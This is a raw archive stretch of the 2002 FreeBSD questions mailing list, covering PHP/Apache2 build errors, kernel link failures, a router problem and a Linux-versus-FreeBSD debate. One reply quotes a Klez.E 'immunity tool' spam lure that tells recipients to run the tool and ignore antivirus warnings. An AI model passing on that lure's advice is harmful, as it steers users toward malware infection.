without. The largest CD I've ever seen is 750meg, which means you need to clean out about 250meg. -- Bill Moran Potential Technologies http://www.potentialtech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 20: 5:54 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jive.SoftHome.net (jive.SoftHome.net [66.54.152.27]) by hub.freebsd.org (Postfix) with SMTP id F066437B400 for ; Tue, 25 Jun 2002 20:05:47 -0700 (PDT) Received: (qmail 2728 invoked by uid 417); 26 Jun 2002 03:05:42 -0000 Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12) by shunt-smtp-out-0 with SMTP; 26 Jun 2002 03:05:42 -0000 Received: from aurvandil.softhome.net ([66.114.152.144]) (AUTH: LOGIN jicit@softhome.net) by softhome.net with esmtp; Tue, 25 Jun 2002 21:05:41 -0600 Message-Id: <5.1.1.6.0.20020625200449.0211ad58@mail.infinitebubble.com> X-Sender: jicit@mail.softhome.net X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 25 Jun 2002 20:05:04 -0700 To: Mark Rowlands , Alex Charalabidis , "Jon Noack" From: Jason Subject: Re: update of apache2 breaks php4 Cc: freebsd-questions@FreeBSD.ORG In-Reply-To: <200206201749.28376.mark.rowlands@minmail.net> References: <20020620023717.P20061-100000@mail.kragware.com> <20020620023717.P20061-100000@mail.kragware.com> Mime-Version: 1.0 Content-Type: multipart/mixed; x-avg-checked=avg-ok-5CC772AB; boundary="=_jive-2653-1025060742-0001-2" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a MIME-formatted message. If you see this text it means that your E-mail software does not support MIME-formatted messages. --=_jive-2653-1025060742-0001-2 Content-Type: text/plain; x-avg-checked=avg-ok-5CC772AB; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Mime-Autoconverted: from 8bit to 7bit by courier 0.38 At 05:49 PM 6/20/2002 +0200, Mark Rowlands wrote: >On Thursday 20 June 2002 9:48 am, Alex Charalabidis wrote: > > On Thu, 20 Jun 2002, Mark Rowlands wrote: > > > while installing mod_php4 WITH_APACHE2 the follow error occurs: > > > > > > php_functions.c:93 syntax error > > > > > > stop in ../work/php-4.2.1/sapi/apache2filter > > > > > > attempting to install apache2 standalone produces the following error > > > when you try to start apache..... > > > > > > httpd:module "sapi_apache2.c" is not compatible with this version of > > > Apache. > > > > > > thoughts anybody? > > > > Edited php_functions.c and replaced MODULE_MAGIC_AT_LEAST with > > AP_MODULE_MAGIC_AT_LEAST. It built. It runs. > >thanks a million gentlemen. May you be blessed with your heart's desire. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-questions" in the body of the message I had no problems while installing using: cd /usr/ports/www/mod_php4 make -DWITH_APACHE2 install However when I try to start apache I get this error: Syntax error on line 273 of /usr/local/etc/apache2/httpd.conf: Cannot load /usr/local/libexec/apache2/libphp4.so into server: /usr/local/libexec/apache2/libphp4.so: Undefined symbol "ssl_onceonlyinit" Any ideas on how to fix it? --=_jive-2653-1025060742-0001-2 Content-Type: text/plain; charset=us-ascii; x-avg=cert; x-avg-checked=avg-ok-5CC772AB Content-Transfer-Encoding: 7bit Content-Disposition: inline --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.371 / Virus Database: 206 - Release Date: 6/13/2002 --=_jive-2653-1025060742-0001-2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 20: 7:54 2002 Delivered-To: freebsd-questions@freebsd.org Received: from roc-66-66-120-36.rochester.rr.com (roc-66-66-120-36.rochester.rr.com [66.66.120.36]) by hub.freebsd.org (Postfix) with ESMTP id 3B60C37B410 for ; Tue, 25 Jun 2002 20:07:05 -0700 (PDT) Received: by roc-66-66-120-36.rochester.rr.com (Postfix, from userid 1000) id 11DC5901A00; Tue, 25 Jun 2002 23:06:07 -0400 (EDT) Date: Tue, 25 Jun 2002 23:06:07 -0400 From: mpd To: Sanjay Bhattacharya Cc: freebsd-questions@FreeBSD.ORG Subject: Re: Long live The Penguin!!!! Message-ID: <20020626030607.GA23480@rochester.rr.com> References: <20020625135153.M403-100000@localhost> <5.1.1.6.2.20020625121305.03d1f270@pop3s.schulte.org> <20020625120402.A7861@cygnus.wks.Gallup.cia-g.com> <00d201c21cbd$3b9ff2d0$1ba8c8cb@corrsl7vs6l3tz> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <00d201c21cbd$3b9ff2d0$1ba8c8cb@corrsl7vs6l3tz> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, Jun 26, 2002 at 08:27:09AM +0530, Sanjay Bhattacharya wrote: > Please guys (the anti Penguin lobby), relax. I've been making my bread and > butter out of Linux for the last 3 years. And I am a Sun Certified System > Administrator. Still I've chosen my work field to be Linux. Why? Because I > am in love with the penguin. As for me I haven't found anything that's > drastically wrong as it always happens with Winblows. On the contrary there > are revolutionary changes in 2.4 series kernels. One that has made my life a > lot easier is certianly netfilter/iptables. And as for the libc problem, a > little caution always saved my from big hassles. I am sort of a newbie to > FreeBSD. But one thing I dislike about it is ipfw. Its so complicated. In > contrast iptables in Linux is a pleasure to use. Apart from that upgrading > Linux kernel is an easy task. I always patch my kernel with the latest > updates and then I compile it. It runs like a dream. And believe me, I > haven't faced a single problem in the last three years. But one thing I > always avoid is rpm's. You might call me an old timer but I've my faith on > the sources. And the configure/make/make install/ has always given me what I > wanted. And to say nothing of the device recognition capabilities of the > Linux kernel. I thank my lucky stars again and again that I don't have to > bother about the HCL, thanks to Linux. So I think the Penguin is doing a > great job. And under no circumstances it is inferior to the daemon. I want > to conclude with the slogan ..."In Penguin I trust". > > rgds, > Sanjay > > And this pertains to FreeBSD how? You mentioned that you didn't like ipfw. Did you try ipf? Other than that, you sound like a salesman. This is a questions list. I get enough garbage e-mail as it is. Any follow-ups should be off-list, or moved to chat, or anywhere other than here. mike -- ___________________________________________________________ "WITH A FEW SMALL MODIFICATIONS ANY CANOE CAN TRAVEL THROUGH TIME!!!" - Pokey the Penguin from "POKEY IN ANCIENT SCOTLAND" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 20: 8: 8 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jive.SoftHome.net (jive.SoftHome.net [66.54.152.27]) by hub.freebsd.org (Postfix) with SMTP id 4E63A37B415 for ; Tue, 25 Jun 2002 20:07:44 -0700 (PDT) Received: (qmail 9165 invoked by uid 417); 26 Jun 2002 03:07:44 -0000 Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12) by shunt-smtp-out-0 with SMTP; 26 Jun 2002 03:07:44 -0000 Received: from unknown ([216.194.4.88]) (AUTH: LOGIN yid@softhome.net) by softhome.net with esmtp; Tue, 25 Jun 2002 21:07:42 -0600 Date: Tue, 25 Jun 2002 23:07:41 -0400 From: Joshua Lee To: freebsd-questions@FreeBSD.org Subject: bad install for ksh93? Message-Id: <20020625230741.0c3f63fe.yid@softhome.net> Organization: Plan B Software Labs X-Mailer: Sylpheed version 0.7.5claws (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I can't seem to get /usr/port/shell/ksh93's make install to work. I tried running just "make" and it compiles without errors, but running "make install" makes it claim that the binary isn't there. Has this been fixed in CVSup, or is there another way to make it install? I tried pkg_add -r too but it couldn't find it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 20:11:15 2002 Delivered-To: freebsd-questions@freebsd.org Received: from russian-caravan.cloud9.net (russian-caravan.cloud9.net [168.100.1.4]) by hub.freebsd.org (Postfix) with ESMTP id D9DE337B400 for ; Tue, 25 Jun 2002 20:11:10 -0700 (PDT) Received: from earl-grey.cloud9.net (earl-grey.cloud9.net [168.100.1.1]) by russian-caravan.cloud9.net (Postfix) with ESMTP id E865028D78; Tue, 25 Jun 2002 23:10:59 -0400 (EDT) Date: Tue, 25 Jun 2002 23:10:59 -0400 (EDT) From: Peter Leftwich X-X-Sender: To: Jeff Shevlen Cc: FreeBSD LIST Subject: Re: blogs In-Reply-To: <00ee01c21cbd$04cd5f40$b300a8c0@wenk> Message-ID: <20020625230908.J46730-100000@earl-grey.cloud9.net> Organization: Video2Video Services - http://Www.Video2Video.Com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, Jeff Shevlen wrote: > Does anyone have any experiences with blog software they can share? > I've got a friend who wants to set up a blog in my humble domain. The thing is I'm very protective of said domain, and don't like the idea of running cgi and god knows what else, without vetting the whole thing. > I've looked into the big two: > http://www.movabletype.com > http://www.noahgrey.com/greysoft/ .. plus all the ones on sourceforge. > All comments are welcome, and in particular comments on security related issues would be great. > Thnx > Jeff This isn't really the proper forum. I would recommend you search forums for a particular software title, and choose one that is open-source. -- Peter Leftwich President & Founder Video2Video Services Box 13692, La Jolla, CA, 92039 USA +1-413-403-9555 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 20:11:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from walnut.config.com (walnut.config.com [216.28.158.11]) by hub.freebsd.org (Postfix) with ESMTP id DF71B37B403 for ; Tue, 25 Jun 2002 20:11:24 -0700 (PDT) Received: from config.com (tc2-27.Mantua.OH.config.com [216.28.160.27]) by walnut.config.com (Switch-2.1.2/Switch-2.1.2) with ESMTP id g5Q3BJ138397 for ; Tue, 25 Jun 2002 23:11:20 -0400 (EDT) Message-ID: <3D1932EE.30601@config.com> Date: Tue, 25 Jun 2002 23:20:14 -0400 From: lketter User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc3) Gecko/20020607 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-questions@FreeBSD.org Subject: make fail... Content-Type: multipart/mixed; boundary="------------030003020102090001000902" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. --------------030003020102090001000902 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit To Whom it may concern; I have a system that is having a make fail after an upgrade from FBSD 4.5 to FBSD 4.6. Attached are files showing my system info, my 'MYKERNEL, and the results of make.... If there are any suggestions to repair this, please email me.... Thanks, Lester PS These are basically the same paramaters of my 4.5 kernel, just with the new GENERIC copied.... The old one fails now with the same errors... --------------030003020102090001000902 Content-Type: text/plain; name="make_info" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="make_info" linking kernel des_enc.o: In function `des_encrypt2': des_enc.o(.text+0x1040): multiple definition of `des_encrypt2' des_ecb.o(.text+0x688): first defined here /usr/libexec/elf/ld: Warning: size of symbol `des_encrypt2' changed from 1237 to 3999 in des_enc.o des_enc.o: In function `des_encrypt1': des_enc.o(.text+0x94): undefined reference to `des_SPtrans' des_enc.o(.text+0x9e): undefined reference to `des_SPtrans' des_enc.o(.text+0xab): undefined reference to `des_SPtrans' des_enc.o(.text+0xb8): undefined reference to `des_SPtrans' des_enc.o(.text+0xd1): undefined reference to `des_SPtrans' des_enc.o(.text+0xd9): more undefined references to `des_SPtrans' follow *** Error code 1 Stop in /usr/src/sys/compile/MYKERNEL. --------------030003020102090001000902 Content-Type: text/plain; name="sys-info" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="sys-info" Copyright (c) 1992-2002 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.5-RELEASE #0: Wed Feb 27 09:14:20 EST 2002 Timecounter "i8254" frequency 1193182 Hz Timecounter "TSC" frequency 451026148 Hz CPU: AMD-K6(tm) 3D processor (451.03-MHz 586-class CPU) Origin = "AuthenticAMD" Id = 0x58c Stepping = 12 Features=0x8021bf AMD Features=0x80000800 real memory = 268369920 (262080K bytes) avail memory = 258134016 (252084K bytes) Preloaded elf kernel "kernel" at 0xc02fc000. K6-family MTRR support enabled (2 registers) md0: Malloc disk Using $PIR table, 6 entries at 0xc00fdd50 npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pcib0 pcib1: at device 1.0 on pci0 pci1: on pcib1 pci1: <3Dfx Voodoo 3 graphics accelerator> at 0.0 irq 10 isab0: at device 7.0 on pci0 isa0: on isab0 atapci0: port 0xe400-0xe40f at device 7.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 uhci0: port 0xe000-0xe01f irq 5 at device 7.2 on pci0 usb0: on uhci0 usb0: USB revision 1.0 uhub0: VIA UHCI root hub, class 9/0, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered pcib2: at device 7.3 on pci0 vx0: <3COM 3C595 Fast Etherlink III PCI> port 0xe800-0xe81f irq 10 at device 8.0 on pci0 vx0: driver is using old-style compatibility shims pcm0: port 0xec00-0xec3f irq 11 at device 9.0 on pci0 orm0:
Umm... Actually I am protected by the = best "Klez=20 immunity" tool on the planet.  It is called FreeBSD!  Thanks = FreeBSD=20 Team!
----- Original Message -----
From:=20 info
Sent: Tuesday, June 25, 2002 = 6:43=20 PM
Subject: Worm Klez.E = immunity

Klez.E is the most common world-wide spreading = worm.It's=20 very dangerous by corrupting your files.
Because of its very smart = stealth=20 and anti-anti-virus technic,most common AV software can't detect or = clean=20 it.
We developed this free immunity tool to defeat the malicious=20 virus.
You only need to run this tool once,and then Klez will never = come=20 into your PC.
NOTE: Because this tool acts as a fake Klez to fool = the real=20 worm,some AV monitor maybe cry when you run it.
If so,Ignore the=20 warning,and select 'continue'.
If you have any question,please mail to me.
 

---
Outgoing mail is certified Virus Free.
Checked by = AVG=20 anti-virus system (http://www.grisoft.com).
Version: = 6.0.372=20 / Virus Database: 207 - Release Date: = 6/20/2002
------=_NextPart_000_0022_01C21C9B.33B36A60-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 21: 2:43 2002 Delivered-To: freebsd-questions@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id 619CB37B400 for ; Tue, 25 Jun 2002 21:02:37 -0700 (PDT) Received: from armageddon (24-197-196-76.man.mn.charter.com [24.197.196.76]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5Q3sB5n007038; Tue, 25 Jun 2002 23:54:12 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'Peter Leftwich'" , "'Sanjay Bhattacharya'" Cc: "'FreeBSD LIST'" Subject: RE: Long live The Penguin!!!! [ipfw vs Linux] Date: Tue, 25 Jun 2002 23:02:13 -0500 Message-ID: <002501c21cc6$4502f800$6501a8c0@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <20020625231522.J46730-100000@earl-grey.cloud9.net> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I personally have not had any problems with ipfw. The amount of features and capabilities is what makes it so complicated. Granted, it could be a little easier to understand. It's worked for me and I, personally, don't have a problem understanding the configuration and use of it. It actually resembles the firewalling capabilities of Cisco's IOS. Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Peter Leftwich Sent: Tuesday, June 25, 2002 10:19 PM To: Sanjay Bhattacharya Cc: FreeBSD LIST Subject: Re: Long live The Penguin!!!! [ipfw vs Linux] On Wed, 26 Jun 2002, Sanjay Bhattacharya wrote: > Please guys (the anti Penguin lobby), relax. I've been making my bread and > butter out of Linux for the last 3 years. And I am a Sun Certified System > Administrator. Still I've chosen my work field to be Linux. Why? Because I > am in love with the penguin. As for me I haven't found anything that's > drastically wrong as it always happens with Winblows. On the contrary there > are revolutionary changes in 2.4 series kernels. One that has made my life a > lot easier is certianly netfilter/iptables. And as for the libc problem, a > little caution always saved my from big hassles. I am sort of a newbie to > FreeBSD. But one thing I dislike about it is ipfw. Its so complicated. In > contrast iptables in Linux is a pleasure to use. Apart from that upgrading > Linux kernel is an easy task. I always patch my kernel with the latest > updates and then I compile it. It runs like a dream. And believe me, I > haven't faced a single problem in the last three years. But one thing I > always avoid is rpm's. You might call me an old timer but I've my faith on > the sources. And the configure/make/make install/ has always given me what I > wanted. And to say nothing of the device recognition capabilities of the > Linux kernel. I thank my lucky stars again and again that I don't have to > bother about the HCL, thanks to Linux. So I think the Penguin is doing a > great job. And under no circumstances it is inferior to the daemon. I want > to conclude with the slogan ..."In Penguin I trust". > rgds, > Sanjay Sanjay, I'm not really aware of an "Anti-Penguin lobby" herein, nor am I understanding of your motives in posting here. Is there a question in all that poorly-worded and grammatically-challenged drivel? :) j/k [And yeah! *sighs* ipfw is a bee-yatsch isn't it?! Kept me away from it.] -- Peter Leftwich President & Founder Video2Video Services Box 13692, La Jolla, CA, 92039 USA +1-413-403-9555 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 21: 8:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id 9505537B404 for ; Tue, 25 Jun 2002 21:08:11 -0700 (PDT) Received: from armageddon (24-197-196-76.man.mn.charter.com [24.197.196.76]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5Q3xk5n007082; Tue, 25 Jun 2002 23:59:46 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'ro0t'" , Subject: RE: cannot access my web server Date: Tue, 25 Jun 2002 23:07:47 -0500 Message-ID: <002601c21cc7$0be805a0$6501a8c0@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I can hit your site just fine from the outside. You're probably receiving a routing problem. The router on your network is seeing that the request is bouncing back to it's own network from the inside, so it's assuming that you want to access the management functions. If you're inside your own network, you're better off using the IP address of the appropriate server. Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of ro0t Sent: Tuesday, June 25, 2002 4:08 PM To: freebsd-questions@FreeBSD.ORG Subject: cannot access my web server This is way off topic, but i have searched every search engine i can think of. I know thats not an excuse but, im really stuck here and hoping someone knows what im doing wrong. Because of recent denial of service attacks against my website, i had to buy a hardware firewall router. Well now all my boxes are behind the router, including the clients. Whenever i try to go to any four of my domains, instead of seeing my website, the router config passwd box pops up. My last router did not do this. And no matter what i do i cannot get it to work. I understand i can go to http://192.168.1.80 which is the internal lan address of the freebsd server, but you have to understand that everything links to http://www.unixhideout.com such as images, and also how would my vhosts work? like http://freebsd.unixhideout.com and https://email.unixhideout.com ? The ports are forwarded correctly, and i am specifying local ips for both the clients and servers and yes the ports are forwarded and configured to the servers correctly. FYI the router in question is a Netgear R0318. And before i get flamed i did call tech support and search the net. I cant get someone on tech support for netgear that speaks english i understand, (im not being rude, i really just cant understand them i called 6 times with my eyes closed and full concentration and everytime i got a tech i couldnt understand.) Just an off topic question that i am truly stumped on. If you mind it just delete it. I wont post about it again. Im just almost certain someone on this list has my answers. sigh. Mike "ro0t" Network Administrator. The UnixHideout Network. http://www.unixhideout.com http://freebsd.unixhideout.com irc.unixhideout.com #Unixhideout To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 21:16:51 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id 4FC1137B400 for ; Tue, 25 Jun 2002 21:16:42 -0700 (PDT) Received: from daleco [12.145.236.48] by mail.gbronline.com (SMTPD32-7.10) id AFC81CF500E2; Tue, 25 Jun 2002 23:15:04 -0500 Message-ID: <039e01c21cc8$318609a0$30ec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Eric F Crist" , "'ro0t'" , References: <002601c21cc7$0be805a0$6501a8c0@armageddon> Subject: Re: cannot access my web server Date: Tue, 25 Jun 2002 23:16:05 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Amen. And to add, I have a LinkSys router on one LAN I work with, and it has a subroutine built in to route http requests for the local domain to the local server via its inside interface. Check your docs.... Also, I guess there's an old-fashioned alternative. Add www.yourdomain.com to the hosts file on all LAN machines......nothing particularly wrong with doing that, I suppose. Or run a DNS server internally.... Kevin Kinsey ----- Original Message ----- From: "Eric F Crist" To: "'ro0t'" ; Sent: Tuesday, June 25, 2002 11:07 PM Subject: RE: cannot access my web server > I can hit your site just fine from the outside. You're probably > receiving a routing problem. The router on your network is seeing that > the request is bouncing back to it's own network from the inside, so > it's assuming that you want to access the management functions. If > you're inside your own network, you're better off using the IP address > of the appropriate server. > > Eric F Crist > President/Sys Admin > AdTech Integrated Systems, Inc > http://www.adtechintegrated.com > > > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of ro0t > Sent: Tuesday, June 25, 2002 4:08 PM > To: freebsd-questions@FreeBSD.ORG > Subject: cannot access my web server > > > This is way off topic, but i have searched every search engine i can > think > of. I know thats not an excuse but, im really stuck here and hoping > someone > knows what im doing wrong. > Because of recent denial of service attacks against my website, i had to > buy > a hardware firewall router. Well now all my boxes are behind the router, > including the clients. Whenever i try to go to any four of my domains, > instead of seeing my website, the router config passwd box pops up. My > last > router did not do this. And no matter what i do i cannot get it to work. > I > understand i can go to http://192.168.1.80 which is the internal lan > address > of the freebsd server, but you have to understand that everything links > to > http://www.unixhideout.com such as images, and also how would my vhosts > work? like http://freebsd.unixhideout.com and > https://email.unixhideout.com > ? The ports are forwarded correctly, and i am specifying local ips for > both > the clients and servers and yes the ports are forwarded and configured > to > the servers correctly. FYI the router in question is a Netgear R0318. > And > before i get flamed i did call tech support and search the net. I cant > get > someone on tech support for netgear that speaks english i understand, > (im > not being rude, i really just cant understand them i called 6 times with > my > eyes closed and full concentration and everytime i got a tech i couldnt > understand.) Just an off topic question that i am truly stumped on. If > you > mind it just delete it. I wont post about it again. Im just almost > certain > someone on this list has my answers. sigh. > > Mike "ro0t" > Network Administrator. > The UnixHideout Network. > http://www.unixhideout.com > http://freebsd.unixhideout.com > irc.unixhideout.com #Unixhideout > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 21:25: 9 2002 Delivered-To: freebsd-questions@freebsd.org Received: from seven.slakin.net (adsl-67-112-126-134.dsl.pltn13.pacbell.net [67.112.126.134]) by hub.freebsd.org (Postfix) with ESMTP id E498B37B400 for ; Tue, 25 Jun 2002 21:25:05 -0700 (PDT) Received: from localhost (localhost.slakin.net [127.0.0.1]) by seven.slakin.net (Postfix) with ESMTP id 9670F7F0; Tue, 25 Jun 2002 21:25:12 -0700 (PDT) Date: Tue, 25 Jun 2002 21:25:12 -0700 (PDT) From: Matt Snow To: Sanjay Bhattacharya Cc: freebsd-questions@freebsd.org Subject: Re: Long live The Penguin!!!! In-Reply-To: <00d201c21cbd$3b9ff2d0$1ba8c8cb@corrsl7vs6l3tz> Message-ID: <20020625210810.E69266-100000@seven.slakin.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I started using Slackware Linux in late 96', yes I loved it. around a year and a half ago I started using FreeBSD and came to love both. But I disagree with 2 of your opinions: 1) NetFilter/IPtables/chains is more complex then ipfw/ipfilter, I have read several articles on iptables and read the man pages, it is still nonesense to me. compare a rule set from iptables to ipfw or IPFilter, most anyone with networking knowledge could decipher ipfw or IPFilter. Where as I still get confused with iptables. 2) keeping your kernel source up to date is far easier on *BSD then Linux. all I have to do is run `cvsup /etc/stable-supfile` to get the latest kernel *and* system binary sources. As for compiling app's on FreeBSD its a sinch! choose your poison: locate or find, (`find /usr/ports -name appname` or `locate appname`) then cd into the port directory (cd /usr/ports/category/appname), and make all instal. I find this much easier then going to a site in lynx, finding the download, untar'ing and running ./configure;make;make install. This is just MY OWN personal opinion. I believe both Linux and *BSD have its use's and place's. * * * * * * * * Matt Snow (@) drama@slakin.net (w) http://slakin.net. On Wed, 26 Jun 2002, Sanjay Bhattacharya wrote: > Please guys (the anti Penguin lobby), relax. I've been making my bread and > butter out of Linux for the last 3 years. And I am a Sun Certified System > Administrator. Still I've chosen my work field to be Linux. Why? Because I > am in love with the penguin. As for me I haven't found anything that's > drastically wrong as it always happens with Winblows. On the contrary there > are revolutionary changes in 2.4 series kernels. One that has made my life a > lot easier is certianly netfilter/iptables. And as for the libc problem, a > little caution always saved my from big hassles. I am sort of a newbie to > FreeBSD. But one thing I dislike about it is ipfw. Its so complicated. In > contrast iptables in Linux is a pleasure to use. Apart from that upgrading > Linux kernel is an easy task. I always patch my kernel with the latest > updates and then I compile it. It runs like a dream. And believe me, I > haven't faced a single problem in the last three years. But one thing I > always avoid is rpm's. You might call me an old timer but I've my faith on > the sources. And the configure/make/make install/ has always given me what I > wanted. And to say nothing of the device recognition capabilities of the > Linux kernel. I thank my lucky stars again and again that I don't have to > bother about the HCL, thanks to Linux. So I think the Penguin is doing a > great job. And under no circumstances it is inferior to the daemon. I want > to conclude with the slogan ..."In Penguin I trust". > > rgds, > Sanjay > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 21:29:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from www.technaholics.com (12-218-133-12.client.mchsi.com [12.218.133.12]) by hub.freebsd.org (Postfix) with ESMTP id 49ACB37B406 for ; Tue, 25 Jun 2002 21:28:58 -0700 (PDT) Received: from SPGCALBERTA ([10.15.1.21]) by www.technaholics.com (8.11.3/8.11.3) with SMTP id g5Q4Sir06871; Tue, 25 Jun 2002 23:28:45 -0500 (CDT) (envelope-from chadalbert@mchsi.com) Message-ID: <005c01c21cc9$f7788470$15010f0a@SPGCALBERTA> From: "Chad Albert" To: "Eric F Crist" , "'Peter Leftwich'" , "'Sanjay Bhattacharya'" Cc: "'FreeBSD LIST'" References: <002501c21cc6$4502f800$6501a8c0@armageddon> Subject: Re: Long live The Penguin!!!! [ipfw vs Linux] Date: Tue, 25 Jun 2002 23:28:43 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" 